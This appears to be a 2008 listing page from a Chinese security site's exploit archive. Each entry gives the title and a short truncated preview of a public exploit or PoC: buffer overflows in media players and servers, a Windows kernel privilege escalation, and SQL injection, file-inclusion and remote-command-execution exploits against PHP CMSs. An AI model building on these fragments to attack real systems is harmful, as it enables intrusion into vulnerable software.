首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC
  日期:2008-04-18 10:03:22 点击:37 评论:0
#!/usr/bin/python # # BS.player 2.27 Build 959 SRT Buffer Overflow # Just rename movie.srt file with the name of the movie you like... # # Vulnerability discovered by Muris Kurgas a.k.a j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users
Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC[0day]
  日期:2008-04-18 10:00:50 点击:51 评论:0
dll版本7.03.0616.0 IE7+xpsp2 测试通过。 转载请注明出处并保持完整性,谢谢。 html head titleMicrosoft Works 7 WkImgSrv.dll crash POC/title script language=JavaScript function payload() { var num = -1; obj.WksPictureInterface = num; } /script /head bod
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
  日期:2008-04-17 16:37:25 点击:130 评论:0
欢迎转载,但希望大家注明出处和保留其完整性,谢谢:) MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit 另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行 #include stdio.h #include windows.h typedef LONG NTSTATUS; ty
MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit
  日期:2008-04-17 16:33:13 点击:262 评论:0
问题出在ProbeForWrite在处理指定的地址可写时,传入指定的长度为0时就不进行判断,就可以造成指定的地址可写,这样我们就可以写任意的内核空间了, .text:BF850BB7 push 14h .text:BF850BB9 push offset stru_BF9940D0 .text:BF850BBE call __SEH_prolog .text:BF850B
BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC
  日期:2008-04-17 10:12:02 点击:31 评论:0
#!/usr/bin/python # # BS.player 2.27 Build 959 SRT Buffer Overflow # Just rename movie.srt file with the name of the movie you like... # # Vulnerability discovered by Muris Kurgas a.k.a j0rgan # jorganwd [at] gmail [dot] com # http://www.jorgan.users
BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
  日期:2008-04-16 10:36:54 点击:52 评论:0
#!/usr/bin/python ############################################################################### # BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day) # Matteo Memelli aka ryujin # www.be4mind.com - www.gray-world.net # 04/13/2008 # Tested on
DivX Player <= 6.7.0 SRT File Buffer Overflow PoC
  日期:2008-04-16 10:34:33 点击:33 评论:0
# DIVX Player = 6.7.0 Buffer Overflow PoC ( .SRT ) # Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritted: # Replace MOVIE_FILENAME by your movie filename ( .avi ) # #!/usr/local/bin/perl
KwsPHP (Upload) Remote Code Execution Exploit
  日期:2008-04-15 11:05:31 点击:44 评论:0
?php /* ---KwsPHP All Version / Remote Code Execution--- Faille Discovered By TsukasaGenesis Ajax Sploit Coded By Ajax */ if($argc9){ print ---KwsPHP All Version / Remote Code Execution---nn; print usage: kwsphpsploit.php -url url -login login -pas
HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Overflow Exploit
  日期:2008-04-15 11:02:03 点击:75 评论:0
/* Dreatica-FXP crew * * ---------------------------------------- * Target : HP OpenView Network Node Manager v7.5 * ---------------------------------------- * Exploit : HP OpenView NNM v7.5.1 ovalarmsrv.exe Remote Buffer Overflow Exploit * Exploit d
Mumbo Jumbo Media OP4 Remote Blind SQL Injection Exploit
  日期:2008-04-14 10:01:06 点击:28 评论:0
?php ini_set(max_execution_time,0); print_r(' ############################################################### # # Mumbo Jumbo Media - OP4 - Blind SQL Injection Exploit # # Vulnerability discovered by: Lidloses_Auge # Exploit coded by: Lidloses_Auge #
XM Easy Personal FTP Server 5.4.0 (XCWD) Denial of Service Exploit
  日期:2008-04-14 10:00:26 点击:33 评论:0
#!/usr/bin/python ######################################## # XM Easy Personal FTP Server 5.4.0 (XCWD) DoS # # When admin looks at the server log, application crashes :) # # Elhamdulillahi Rabbil-alemin! # ######################################## # bt
1024 CMS <= 1.4.2 Local File Inclusion / Blind SQL Injection Exploit
  日期:2008-04-14 09:59:48 点击:44 评论:0
# Author:__GiReX__ # mySite:girex.altervista.org # Date:13/04/2008 # CMS: 1024 CMS = 1.4.1 and 1.4.2 (beta) # Site:1024cms.com # Bug1:Local File Inclusion # Need:magic_quotes_gpc = Off / register_globals = On # Bug2:Cookie Blind SQL Injection # Explo
Borland InterBase 2007 ibserver.exe Buffer Overflow PoC
  日期:2008-04-14 09:59:07 点击:39 评论:0
############################################################################################################### # POC.pl # ############################################################################################################### #!/usr/bin/perl
LightNEasy 1.2 (no database) Remote Hash Retrieve Exploit
  日期:2008-04-11 13:07:42 点击:36 评论:0
# Author:__GiReX__ # mySite:girex.altervista.org # Date:10/04/08 # CMS: LightNEasy 1.2 no database # Site:lightneasy.org # Bug:Hash Disclosure # Exploit:Remote Hash Retrieve # Bug Explanation: LightNEasy/lightneasy.php if($_GET['do']!=login $_GET['do
LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit
  日期:2008-04-11 11:01:14 点击:39 评论:0
#!/usr/bin/perl -w use LWP::UserAgent; #-----------------------------------------------------------------------------------------------# # scripts : livecart Remote Blind Sql Injection# # scripts site : http://www.livecart.com# ## # Discovered# # By
KnowledgeQuest 2.5 Arbitrary Add Admin Exploit
  日期:2008-04-10 10:14:25 点击:9 评论:0
#!/usr/bin/perl use strict; use LWP::UserAgent; print -+------------------------------------------+-n; print -+- KnowledgeQuest 2.5 Arbitrary Add Admin -+-n; print -+------------------------------------------+-n; print -+- Discovered Coded By t0pP
phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit
  日期:2008-04-10 10:13:54 点击:38 评论:0
html head meta http-equiv=Content-Type content=text/html; charset=windows-1254 titleFishing Cat Portal Addon (functions_portal.php) Remote File Inclusion Exploit/title script language=JavaScript //'Bug found and Exploit coded by bd0rk //'Vendor: http
Biz E-Banking Integrator V2 ActiveX Edition Insecure Method Exploit
  日期:2008-04-10 10:13:14 点击:17 评论:0
-------------------------------------------------------------------- IBiz E-Banking Integrator V2 ActiveX Edition Insecure Method Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational
LokiCMS <= 0.3.3 Remote Command Execution Exploit
  日期:2008-04-09 12:57:10 点击:24 评论:0
# Author:__GiReX__ # mySite:girex.altervista.org # Date:8/04/08 # CMS: LokiCMS = 0.3.3 # Site:lokicms.com # Bug: PHP Code Injection # Exploit:Remote Command Execution # Vuln Code: admin.php #if ($_GET['default'] != '') { // User want's to set the def
FLABER <= 1.1 RC1 Remote Command Execution Exploit
  日期:2008-04-09 12:56:26 点击:22 评论:0
?php /* -------------------------------------------------- FLABER = 1.1 RC1 Remote Command Execution Exploit -------------------------------------------------- author...: EgiX mail.....: n0b0d13s[at]gmail[dot]com link.....: http://sourceforge.net/pro
共637页/12733条记录 首页 上一页 [523] [524] [525] 526 [527] [528] [529] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved